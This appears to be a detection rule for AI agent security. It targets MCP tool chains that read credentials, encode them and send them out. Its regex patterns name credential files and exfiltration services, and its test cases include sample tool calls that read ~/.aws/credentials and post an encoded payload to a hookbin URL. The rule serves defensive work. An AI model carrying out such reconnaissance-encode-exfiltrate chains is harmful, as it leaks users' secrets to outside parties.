Multi-Skill Chain Attack

Detects attack sequences where multiple MCP skills are chained together to achieve a malicious outcome that no single skill could accomplish alone. For example: (1) a reconnaissance skill reads sensitive files, (2) an encoding skill obfuscates the data, (3) a network skill exfiltrates it. Each step appears benign individually but the chain constitutes data exfiltration.

Response Actions

References

Wild Validation

1. 01

   Sensitive file/credential access patterns (path-specific, not bare word 'credentials')

   field: tool_argsop: regex
2. 02

   field: tool_argsop: regex
3. 03

   field: tool_argsop: regex
4. 04

   field: tool_nameop: regex

Attack Examples (Rule Triggers)

1. Matches: reading sensitive credential file

   tool_name: file_reader
   tool_args: '{"path": "/home/user/.aws/credentials"}'

2. Matches: sending data to known exfiltration endpoint

   tool_name: send_webhook
   tool_args: '{"url": "https://hookbin.com/abc123", "data": "encoded_payload"}'

Real-world attack payloads (sanitized). Used for regression testing.

Benign Examples (Rule Doesn't Trigger)

1. tool_name: file_reader
   tool_args: '{"path": "/home/user/documents/report.pdf"}'

2. tool_name: email_sender
   tool_args: '{"to": "[email protected]", "subject": "Meeting notes"}'

Known False Positive Contexts

• ▸Legitimate backup or migration workflows that read, compress, and transfer files
• ▸CI/CD pipelines that encode artifacts for deployment
• ▸Monitoring tools that send alerts via webhooks

title: "Multi-Skill Chain Attack"
id: ATR-2026-00063
rule_version: 1
status: experimental
description: >
  Detects attack sequences where multiple MCP skills are chained together to achieve
  a malicious outcome that no single skill could accomplish alone. For example:
  (1) a reconnaissance skill reads sensitive files, (2) an encoding skill obfuscates
  the data, (3) a network skill exfiltrates it. Each step appears benign individually
  but the chain constitutes data exfiltration.
author: "ATR Community"
date: "2026/03/08"
schema_version: "0.1"
detection_tier: pattern
maturity: experimental
severity: critical

references:
  owasp_llm:
    - "LLM03:2025 - Supply Chain Vulnerabilities"
    - "LLM06:2025 - Excessive Agency"
  owasp_agentic:
    - "ASI02:2026 - Tool Misuse and Exploitation"
  mitre_atlas:
    - "AML.T0024 - Exfiltration via ML Inference API"
    - "AML.T0053 - LLM Plugin Compromise"

compliance:
  nist_ai_rmf:
    - subcategory: "MP.5.1"
      context: "Multi-skill chain attacks combine individually benign tool calls into a composite exfiltration or compromise sequence; MP.5.1 requires characterizing the likelihood and magnitude of impact for these emergent risks that only manifest when steps are correlated across skills."
      strength: primary
    - subcategory: "MG.2.3"
      context: "Detection of reconnaissance-then-encode-then-exfiltrate skill chains must trigger pre-defined risk treatment to disengage or quarantine the orchestration before the final exfiltration step completes; MG.2.3 mandates these supersede/deactivate mechanisms are in place."
      strength: secondary
    - subcategory: "GV.6.1"
      context: "Skill chains often span third-party MCP tools whose composed behavior is not covered by individual supplier risk reviews; GV.6.1 requires policies that address third-party AI/tool risks including emergent misuse across multiple suppliers."
      strength: secondary
tags:
  category: tool-poisoning
  subcategory: skill-chain
  scan_target: mcp
  confidence: medium

agent_source:
  type: tool_call
  framework:
    - mcp
    - langchain
    - crewai
    - autogen
  provider:
    - any

detection:
  conditions:
    - field: tool_args
      operator: regex
      value: "(?i)(/etc/passwd|/etc/shadow|(?<![a-z])\\.(env|aws/credentials)|secrets?\\.json|private[_-]?key|id_rsa|kubeconfig)"
      description: "Sensitive file/credential access patterns (path-specific, not bare word 'credentials')"
    - field: tool_args
      operator: regex
      value: "(?i)(base64|btoa|encodeURI|hex\\.encode|rot13|xor|compress|gzip|deflate|encrypt)"
    - field: tool_args
      operator: regex
      value: "(?i)(webhook|ngrok|requestbin|pipedream|hookbin|burpcollaborator|interact\\.sh|oast)"
    - field: tool_name
      operator: regex
      value: "(?i)(send[_-]?(email|message|webhook|http|request)|upload|post[_-]?data|transmit|exfil)"
  condition: any
  false_positives:
    - "Legitimate backup or migration workflows that read, compress, and transfer files"
    - "CI/CD pipelines that encode artifacts for deployment"
    - "Monitoring tools that send alerts via webhooks"

response:
  actions:
    - block_tool
    - alert
    - snapshot
    - escalate
  auto_response_threshold: high
  message_template: >
    [ATR-2026-063] Potential skill chain attack detected. Tool call appears to be
    part of a multi-step attack sequence (reconnaissance -> encoding -> exfiltration).
    Review the full session tool call history.

confidence: 53
wild_validated: "2026/04/08"
wild_samples: 53577
wild_fp_rate: 0
test_cases:
  true_positives:
    - input:
        tool_name: "file_reader"
        tool_args: '{"path": "/home/user/.aws/credentials"}'
      expected: triggered
      matched_condition: "reading sensitive credential file"
    - input:
        tool_name: "send_webhook"
        tool_args: '{"url": "https://hookbin.com/abc123", "data": "encoded_payload"}'
      expected: triggered
      matched_condition: "sending data to known exfiltration endpoint"
  true_negatives:
    - input:
        tool_name: "file_reader"
        tool_args: '{"path": "/home/user/documents/report.pdf"}'
      expected: not_triggered
      reason: "Reading a normal user document"
    - input:
        tool_name: "email_sender"
        tool_args: '{"to": "[email protected]", "subject": "Meeting notes"}'
      expected: not_triggered
      reason: "Sending normal business email"